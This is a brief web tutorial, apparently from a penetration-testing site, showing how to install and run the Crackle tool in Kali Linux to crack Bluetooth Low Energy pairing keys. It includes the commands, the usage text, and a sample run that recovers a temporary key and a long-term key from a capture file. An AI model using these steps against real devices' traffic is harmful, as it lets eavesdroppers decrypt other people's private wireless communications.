Network PentestPenetration Testing

CRACKLE Wireless Attack In Kali Linux

Crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.

With the STK and LTK, all communications between the master and the slave can be decrypted.


If it’s not installed on your Linux simply type

apt-get update
apt-get install crackle


Type crackle


[email protected]:~# crackle
Usage: crackle -i <input.pcap> [-o <output.pcap>] [-l <ltk>]
Cracks Bluetooth Low Energy encryption (AKA Bluetooth Smart)

Major modes:  Crack TK // Decrypt with LTK

Crack TK:

Input PCAP file must contain a complete pairing conversation. If any
packet is missing, cracking will not proceed. The PCAP file will be
decrypted if -o <output.pcap> is specified. If LTK exchange is in
the PCAP file, the LTK will be dumped to stdout.

Decrypt with LTK:

Input PCAP file must contain at least LL_ENC_REQ and LL_ENC_RSP
(which contain the SKD and IV). The PCAP file will be decrypted if
the LTK is correct.

LTK format: a string of hex bytes, no separator, most-significant
octet to least-significant octet.

Example: -l 81b06facd90fe7a6e9bbd9cee59736a7

Optional arguments:

-v   Be verbose
-t   Run tests against crypto engine


[email protected]:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap

TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)

Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3

Related Articles

Back to top button